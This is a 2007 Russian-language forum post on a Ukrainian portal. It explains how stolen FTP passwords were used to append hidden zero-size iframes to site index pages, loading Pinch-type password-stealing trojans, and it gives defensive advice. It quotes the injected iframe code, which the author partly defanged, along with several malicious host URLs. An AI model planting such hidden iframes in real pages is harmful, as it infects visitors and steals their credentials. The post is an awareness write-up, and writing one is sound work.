Пользовательского поиска
Ukrwebmir.Net:) Украинский портал.  Цікаві новини.  Коротко про найцікавіше.
Доска объявлений.
Переобладнання Мікроавтобусів з BusMaster!
Прочие автомобили (12.06.2024)
Послуги копірайтера
Новостройки (28.03.2023)
КОМПАНИЯ "МОТОРИМПЕКС"
Прочее (29.01.2023)
Kingex
Прочее (01.08.2022)
Epilook Лазерная эпиляция
Услуги для женщин (24.05.2022)


 
= Ad with Photo
RSS-канал

Українське ділове мовлення. Календар свят



 

 

IT-новости
Авто-авиа новости
Игры
Интим
Медицина
Это Интересно
Кулинарная азбука
Мир Моды
Мобильные новости
Музыка, кино
Научные новости
Неопознанное
Новости в мире
Новости в Украине
Про женщин
Про мужчин
Проишествия
Спорт

Все новости
Авторизация
Ukrwebmir.Net:) Украинский портал. Цікаві новини. Коротко про найцікавіше. © 2026
planeta
Форум
Добро пожаловать, Гость
Привет! Вход или Регистрация.    Забыли пароль?
Вирусы и всё о них (0 просматривает) 
Вниз Ответить Избранное: 0
Сообщения темы: Вирусы и всё о них
#148
doctor (Администратор)
The way of tea
Администратор
Постов: 79
graphgraph
Пользователь в оффлайне Кликните здесь, чтобы посмотреть профиль этого пользователя
Пол: Мужской
Вирусы и всё о них 18 г., 12 мес. назад Репутация: 0  
Новый троян, похищающий пароли доступа

и не определяющийся антивирусными программами

Как бороться с прокатившейся эпидемией изменения индексных страниц сайтов?


Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.

Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги .

Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.

Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:

_i_frame__ src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" _frame_border="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или _i_frame__ src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /_i_frame__
или другой сайт
Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку . Тег _i_frame__, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере ) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.

Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).
Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.

Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.

Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".

Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.
Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.

Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите

Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.

Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега '_i_frame__' с атрибутами "width="0" height="0" или width="1" height="1".

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla.

Если с Вами произошла эта неприятность, то как от нее избавиться читайте следующий пост форума:


Сообщение отредактировано: doctor, в: 2007/07/06 13:38
 
Сообщение модератору   Зарегистрированный Зарегистрированный  
  Для добавления сообщений, Вы должны зарегистрироваться или авторизоваться.
      Темы Автор Дата
    thread link
Вирусы и всё о них
doctor 06.07.2007 13:33
    thread link
thread linkthread link Очистка Вашего компьютера от вирусной нечисти
doctor 06.07.2007 13:57
    thread link
thread linkthread linkthread link Как защитить свой комп и нервы от троянов ?
doctor 06.09.2007 15:08
    thread link
thread linkthread link RE: Вирусы и всё о них
Nelya 27.08.2018 09:15
    thread link
thread linkthread link RE: Вирусы и всё о них
Mayser 16.05.2019 18:00
    thread link
thread linkthread link RE: Вирусы и всё о них
panbeg 19.05.2019 19:57
    thread link
thread linkthread linkthread link RE: Вирусы и всё о них
Mirami 30.08.2019 10:39
    thread link
thread linkthread link RE: Вирусы и всё о них
BurBon 29.08.2019 06:38
Вверх Ответить
Последние новости

Регистрация доменных имен, хостинг! 


Выбор Portal.Lg.Ua - NATO
Ответственность за содержание публикации полностью ложится на источник информации (см.«Сайт Источника. Администрация портала Ukrwebmir Net может не разделять мнение автора.
пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅ www.femina.com.ua
            пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅ       Rambler's Top100       Rambler's Top100      
Copyright © 2006 - 2024
Компания вебдизайна Интернет технологий "Планета-плюс"